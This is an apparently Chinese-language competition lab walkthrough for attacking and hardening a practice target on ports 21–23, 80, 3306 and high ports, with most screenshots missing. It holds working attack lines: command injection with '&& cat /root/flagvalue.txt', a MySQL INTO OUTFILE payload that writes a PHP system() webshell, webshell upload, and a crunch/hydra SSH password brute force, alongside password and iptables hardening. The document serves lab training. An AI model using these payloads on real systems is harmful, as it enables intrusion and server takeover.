- 信息收集,使用kali,扫描己方靶机端口
![]()

- 21端口的ftp的攻击
ftp攻击方式,查看本机有哪些普通用户

admin/123456和guest/123456

![]()


然后提交flag

- 22端口的ssh攻击
![]()



使用session –I 查看已经获取到的连接

使用session –I 序号 获取连接
![]()
![]()
- 23 telnet的攻击方式

![]()

- 防御21-23端口的攻击
- 改密码

- 或者删除500以上的用户
.

- 80http的攻击方法
进入自己的网站根目录

DisplayDirectory.php

此页面用来查看文件夹内的内容


使用&&加上cat /root/flagvalue.txt查看别人的flag,然后通过修改url,可以快速拿分

加固
![]()


![]()


FileSharing.php 文件上传漏洞

Kali生成木马
![]()

找到存储木马的路径


木马路径

使用工具连接

加固
![]()

![]()

WebShell.php


加固
![]()


通过查看TestConn.php页面可获知数据库密码为root/root

- 3306数据库攻击方式,使用kali远程连接别人的数据库

攻击代码
select '<?php system($_GET[\'a\']); ?>' INTO OUTFILE '/var/www/html/a.php';

攻击

加固漏洞

>use mysql;
>update user set Password=password('123456') where User='root';

修改密码即可

- 攻击10000以后的大端口后门

![]()
加固
写centos的iptables,关闭防火墙

清除防火墙预设规则
![]()
设置默认规则,拒绝所有进来的流量
![]()
设置默认规则,拒绝所有转发流量
![]()
设置默认规则,允许所有出去的流量
![]()
允许21,22,23,80,3306

保存防火墙规则
![]()
启动防火墙

查看结果

攻防对抗2
- 扫描

- 制作字典跑密码
crunch 6 6 -t 0000%% > /passw

开始破解自己的密码
hydra -l root -P /passw -t 4 ssh://172.16.120.250

现在使用putty进去到自己的靶机

- 21-23端口攻击方法一致
- 80端口攻击
生成字典

调出网站后台破解工具
![]()



得出网站后台
- 3306与上文一致
- 大端口修改
攻击方法一致
加固方法需要谨慎
法1:shell脚本一次成型
![]()

![]()

法2:把防火墙规则写在防火墙配置文件里面
![]()












